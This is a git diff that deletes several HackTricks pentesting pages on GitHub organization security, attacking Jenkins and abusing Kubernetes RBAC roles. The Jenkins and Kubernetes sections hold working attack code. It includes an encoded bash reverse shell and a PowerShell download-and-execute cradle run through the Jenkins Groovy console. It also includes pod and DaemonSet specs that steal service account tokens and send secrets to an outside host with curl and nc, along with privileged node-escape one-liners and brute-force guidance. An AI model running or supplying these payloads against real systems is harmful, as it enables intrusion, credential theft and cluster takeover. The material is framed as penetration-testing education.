When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization. - * If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization. -* **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions. -* **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization. - -You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles) - -## Members Privileges - -In _https://github.com/organizations/\/settings/member\_privileges_ you can see the **permissions users will have just for being part of the organisation**. - -The settings here configured will indicate the following permissions of members of the organisation: - -* Be admin, writer, reader or no permission over all the organisation repos. -* If members can create private, internal or public repositories. 
-* If forking of repositories is possible -* If it's possible to invite outside collaborators -* If public or private sites can be published -* The permissions admins has over the repositories -* If members can create new teams - -## Repository Roles - -By default repository roles are created: - -* **Read**: Recommended for **non-code contributors** who want to view or discuss your project -* **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access -* **Write**: Recommended for contributors who **actively push to your project** -* **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions -* **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository - -You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role) - -You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_ - -## Teams - -You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team. - -![](<../../.gitbook/assets/image (630) (1).png>) - -## Users - -The users of an organization can be **listed** in _https://github.com/orgs/\/people._ - -In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**. - -# Github Authentication - -Github offers different ways to authenticate to your account and perform actions on your behalf. 
- -## Web Access - -Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**). - -## **SSH Keys** - -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys) - -### **GPG Keys** - -You **cannot impersonate the user with these keys** but if you don't use them it might be possible that you **get discovered for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode). - -## **Personal Access Tokens** - -You can generate a personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** the **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens) - -## Oauth Applications - -Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms. 
- -* You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers) -* You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications) -* You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) -* You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth\_application\_policy_ - -Some **security recommendations**: - -* An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes.. -* An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user. -* **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s. -* **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it. -* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps). - -## Github Applications - -Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to. 
- -* To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository. -* The GitHub App should **connect to a personal account or an organisation**. -* You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps) -* You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) -* These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them -* You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_ - -Some security recommendations: - -* A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)." -* Make sure the GitHub App integrates with **specific repositories**. -* The GitHub App should **connect to a personal account or an organisation**. -* Don't expect the GitHub App to know and do everything a user can. -* **Don't use a GitHub App if you just need a "Login with GitHub" service**. 
But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things. -* Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do. -* If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)." -* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps). - -## Deploy keys - -Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. - -## Github Actions - -This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information. - -# Git Actions - -Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets). - -## Configuration - -In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization. - -It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions. 
It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the `GITHUB_TOKEN`** of a Github Action when it's run.
- -## Git Action Box - -A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user. - -Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**. - -You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\/settings/actions/runners_ - -The way to find which **Github Actions are being executed in non-github infrastructure** is to search for `runs-on: self-hosted` in the Github Action configuration yaml. - -It's **not possible to run a Github Action of an organization inside a self hosted box** of a different organization because **a unique token is generated for the Runner** when configuring it to know where the runner belongs. - -If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with. - -## Git Action Compromise - -If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed. - -{% hint style="danger" %} -A **malicious Github Action** run could be **abused** by the attacker to: - -* **Steal all the secrets** the Action has access to -* **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service) -* **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**. -{% endhint %} - -# Branch Protections - -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. 
- -The **branch protections of a repository** can be found in _https://github.com/\/\/settings/branches_ - -{% hint style="info" %} -It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. -{% endhint %} - -Different protections can be applied to a branch (like to master): - -* You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place: - * **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly. - * **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it. - * **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it) - * **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews. - * **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions. -* **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret). -* **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged. -* **Require signed commits**. The commits need to be signed. -* **Require linear history.** Prevent merge commits from being pushed to matching branches. -* **Include administrators**. If this isn't set, admins can bypass the restrictions. -* **Restrict who can push to matching branches**. Restrict who can send a PR. 
- -{% hint style="info" %} -As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. -{% endhint %} - -# References - -* [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization) -* [https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise) -* [https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github) -* [https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards) -* [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/jenkins.md b/cloud-security/jenkins.md deleted file mode 100644 index 49835f4db..000000000 --- a/cloud-security/jenkins.md +++ /dev/null @@ -1,224 +0,0 @@ -# Jenkins - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - - -**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. - -{% embed url="https://www.syncubes.com/" %} - -## Basic Information - -Jenkins offers a simple way to set up a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **languages** and source code repositories using pipelines, as well as automating other routine development tasks. While Jenkins doesn’t eliminate the **need to create scripts for individual steps**, it does give you a faster and more robust way to integrate your entire chain of build, test, and deployment tools than you can easily build yourself.\ -Definition from [here](https://www.infoworld.com/article/3239666/what-is-jenkins-the-ci-server-explained.html). - -## Unauthenticated Enumeration - -In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use: - -``` -msf> use auxiliary/scanner/http/jenkins_enum -``` - -Check if you can execute commands without needing authentication: - -``` -msf> use auxiliary/scanner/http/jenkins_command -``` - -Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**. - -You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_ - -![](<../.gitbook/assets/image (415).png>) - -## Login - -You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**\ -Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). 
- -### Bruteforce - -**Jekins** does **not** implement any **password policy** or username **brute-force mitigation**. Then, you **should** always try to **brute-force** users because probably **weak passwords** are being used (even **usernames as passwords** or **reverse** usernames as passwords). - -``` -msf> use auxiliary/scanner/http/jenkins_login -``` - -## Jenkins Abuses - -### Known Vulnerabilities - -{% embed url="https://github.com/gquere/pwn_jenkins" %} - -### Dumping builds to find cleartext secrets - -Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/dump\_builds/jenkins\_dump\_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets. - -### Password spraying - -Use [this python script](https://github.com/gquere/pwn\_jenkins/blob/master/password\_spraying/jenkins\_password\_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray). - -### Decrypt Jenkins secrets offline - -Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/offline\_decryption/jenkins\_offline\_decrypt.py) to decrypt previsously dumped secrets. - -### Decrypt Jenkins secrets from Groovy - -``` -println(hudson.util.Secret.decrypt("{...}")) -``` - - - -**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. - -{% embed url="https://www.syncubes.com/" %} - -## Code Execution - -### **Create a new project** - -This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project). - -1. Create a new project (Freestyle project) -2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). 
Start the payload with _PowerShell.exe_ instead using _powershell._ -3. Click **Build now** - -Go to the projects and check **if you can configure any** of them (look for the "Configure button"): - -![](<../.gitbook/assets/image (158) (1).png>) - -Or **try to access to the path \_/configure**\_ in each project (example: /_me/my-views/view/all/job/Project0/configure_). - -If you are allowed to configure the project you can **make it execute commands when a build is successful**: - -![](<../.gitbook/assets/image (159) (1).png>) - -Click on **Save** and **build** the project and your **command will be executed**.\ -If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**. - -### **Execute Groovy script** - -Best way. Less noisy. - -1. Go to _path\_jenkins/script_ -2. Inside the text box introduce the script - -```python -def process = "PowerShell.exe ".execute() -println "Found text ${process.text}" -``` - -You could execute a command using: `cmd.exe /c dir` - -In **linux** you can do: **`"ls /".execute().text`** - -If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload. 
- -**Another useful groovy script** is (replace \[INSERT COMMAND]): - -```python -def sout = new StringBuffer(), serr = new StringBuffer() -def proc = '[INSERT COMMAND]'.execute() -proc.consumeProcessOutput(sout, serr) -proc.waitForOrKill(1000) -println "out> $sout err> $serr" -``` - -### Reverse shell in linux - -```python -def sout = new StringBuffer(), serr = new StringBuffer() -def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute() -proc.consumeProcessOutput(sout, serr) -proc.waitForOrKill(1000) -println "out> $sout err> $serr" -``` - -### Reverse shell in windows - -You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it: - -```python -scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')" -echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0 -cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc -``` - -### MSF exploit - -You can use MSF to get a reverse shell: - -``` -msf> use exploit/multi/http/jenkins_script_console -``` - -## POST - -### Metasploit - -``` -msf> post/multi/gather/jenkins_gather -``` - -### Files to copy after compromission - -These files are needed to decrypt Jenkins secrets: - -* secrets/master.key -* secrets/hudson.util.Secret - -Such secrets can usually be found in: - -* credentials.xml -* jobs/.../build.xml - -Here's a regexp to find them: - -``` -grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" -``` - -## References - -* [https://github.com/gquere/pwn\_jenkins](https://github.com/gquere/pwn\_jenkins) -* [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/) -* [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password) - - - 
-**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. - -{% embed url="https://www.syncubes.com/" %} - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md deleted file mode 100644 index b7026751e..000000000 --- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md +++ /dev/null @@ -1,664 +0,0 @@ -# Abusing Roles/ClusterRoles in Kubernetes - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -Here you can find some potentially dangerous Roles and ClusterRoles configurations.\ -Remember that you can get all the supported resources with `kubectl api-resources` - -## **Privilege Escalation** - -Referring as the art of getting **access to a different principal** within the cluster **with different privileges** (within the kubernetes cluster or to external clouds) than the ones you already have, in Kubernetes there are basically **4 main techniques to escalate privileges**: - -* Be able to **impersonate** other user/groups/SAs with better privileges within the kubernetes cluster or to external clouds -* Be able to **create/patch/exec pods** where you can **find or attach SAs** with better privileges within the kubernetes cluster or to external clouds -* Be able to **read secrets** as the SAs tokens are stored as secrets -* Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any) -* A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod. - -### **Access Any Resource or Verb** - -This privilege provides access to **any resource with any verb**. It is the most substantial privilege that a user can get, especially if this privilege is also a β€œClusterRole.” If it’s a β€œClusterRole,” than the user can access the resources of any namespace and own the cluster with that permission. - -```yaml -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRole -metadata: - name: api-resource-verbs-all -rules: -rules: -- apiGroups: ["*"] - resources: ["*"] - verbs: ["*"] -``` - -### **Access Any Resource** - -Giving a user permission to **access any resource can be very risky**. But, **which verbs** allow access to these resources? 
Here are some dangerous RBAC permissions that can damage the whole cluster: - -* **resources: \["\*"] verbs: \["create"]** – This privilege can **create any resource** in the cluster, such as **pods**, roles, etc. An attacker might abuse it to **escalate privileges**. An example of this can be found in the **β€œPods Creation” section**. -* **resources: \["\*"] verbs: \["list"]** – The ability to list any resource can be used to **leak other users’ secrets** and might make it easier to **escalate privileges**. An example of this is located in the **β€œListing secrets” section.** -* **resources: \["\*"] verbs: \["get"]-** This privilege can be used to **get secrets from other service accounts**. - -```yaml -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRole -metadata: - name: api-resource-verbs-all -rules: -rules: -- apiGroups: ["*"] - resources: ["*"] - verbs: ["create", "list", "get"] -``` - -### Pod Create - Steal Token - -An attacker with permission to create a pod in the β€œkube-system” namespace can create cryptomining containers for example. Moreover, if there is a **service account with privileged permissions, by running a pod with that service the permissions can be abused to escalate privileges**. - -![](<../../../.gitbook/assets/image (463).png>) - -Here we have a default privileged account named _bootstrap-signer_ with permissions to list all secrets. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/rolebinding\_with\_cluster\_admin\_clusterrole-1024x545.png) - -The attacker can create a malicious pod that will use the privileged service. 
Then, abusing the service token, it will exfiltrate the secrets:
https://man7.org/linux/man-pages/man7/capabilities.7.html - runAsUser: 0 # run as root (or any other user) - volumeMounts: - - mountPath: /host - name: host-volume - restartPolicy: Never # we want to be intentional about running this pod - hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html - hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html - hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.htmlpe_ - volumes: - - name: host-volume - hostPath: - path: / -``` -{% endcode %} - -Create the pod with: - -```bash -kubectl --token $token create -f mount_root.yaml -``` - -One-liner from [this tweet](https://twitter.com/mauilion/status/1129468485480751104) and with some additions: - -```bash -kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}' -``` - -Now that you can escape to the node check post-exploitation techniques in: - -{% content-ref url="../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - -#### Stealth - -You probably want to be **stealthier**, in the following pages you can see what you would be able to access if you create a pod only enabling some of the mentioned privileges in the previous template: - -* [**Privileged + hostPID**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#privileged-+-hostpid) -* [**Privileged 
only**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#privileged) -* [**hostPath**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#arbitrary-mounts) -* [**hostPID**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#hostpid) -* [**hostNetwork**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#hostnetwork) -* [**hostIPC**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#hostipc) - -_You can find example of how to create/abuse the previous privileged pods configurations in_ [_https://github.com/BishopFox/badPods_](https://github.com/BishopFox/badPods)\_\_ - -### Pod Create - Move to cloud - -If you can **create** a **pod** (and optionally a **service account**) you might be able to **obtain privileges in cloud environment** by **assigning cloud roles to a pod or a service account** and then accessing it.\ -Moreover, if you can create a **pod with the host network namespace** you can **steal the IAM** role of the **node** instance. - -For more information check: - -{% content-ref url="../kubernetes-access-to-other-clouds.md" %} -[kubernetes-access-to-other-clouds.md](../kubernetes-access-to-other-clouds.md) -{% endcontent-ref %} - -### **Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs** - -Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.** - -Suppose we have the **permission to create a Daemonset** and we create the following YAML file. 
This YAML file is configured to do the same steps we mentioned in the β€œcreate pods” section. - -```yaml -apiVersion: apps/v1 -kind: DaemonSet -metadata: - name: alpine - namespace: kube-system -spec: - selector: - matchLabels: - name: alpine - template: - metadata: - labels: - name: alpine - spec: - serviceAccountName: bootstrap-signer - automountServiceAccountToken: true - hostNetwork: true - containers: - - name: alpine - image: alpine - command: ["/bin/sh"] - args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000'] -``` - -In line 6 you can find the object β€œspec” and children objects such as β€œ**template**” in line 10. These objects hold the configuration for the task we wish to accomplish. Another thing to notice is the "**serviceAccountName**" in line 15 and the β€œ**containers**” object in line 18. This is the part that relates to creating our malicious container. - -Kubernetes API documentation indicates that the β€œ**PodTemplateSpec**” endpoint has the option to create containers. And, as you can see: **deployment,** **daemonsets, statefulsets, replicationcontrollers, replicasets, jobs and cronjobs can all be used to create pods**: - -![](https://www.cyberark.com/wp-content/uploads/2019/08/Kube-Pentest-Fig-8.png) - -**So, the privilege to create or update tasks can also be abused for privilege escalation in the cluster.** - -### **Pods Exec** - -**Pod exec** is an option in kubernetes used for **running commands in a shell inside a pod**. This privilege is meant for administrators who want to **access containers and run commands**. It’s just like creating a SSH session for the container. - -If we have this privilege, we actually get the ability **to take control of all the pods**. 
In order to do that, we needs to use the following command: - -```bash -kubectl exec -it -n -- sh -``` - -Note that as you can get inside any pod, you can abuse other pods token just like in [**Pod Creation exploitation**](./#pod-creation) to try to escalate privileges. - -### port-forward - -This permission allows to **forward one local port to one port in the specified pod**. This is meant to be able to debug applications running inside a pod easily, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable applications (webs?) inside a pod: - -``` -kubectl port-forward pod/mypod 5000:5000 -``` - -### **Hosts Writable /var/log/ Escape** - -As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html)\*\*,\*\*If you can access or create a pod with the **hosts `/var/log/` directory mounted** on it, you can **escape from the container**.\ -This is basically because the when the **Kube-API tries to get the logs** of a container (using `kubectl logs `), it **requests the `0.log`** file of the pod using the `/logs/` endpoint of the **Kubelet** service.\ -The Kubelet service exposes the `/logs/` endpoint which is just basically **exposing the `/var/log` filesystem of the container**. - -Therefore, an attacker with **access to write in the /var/log/ folder** of the container could abuse this behaviours in 2 ways: - -* Modifying the `0.log` file of its container (usually located in `/var/logs/pods/namespace_pod_uid/container/0.log`) to be a **symlink pointing to `/etc/shadow`** for example. 
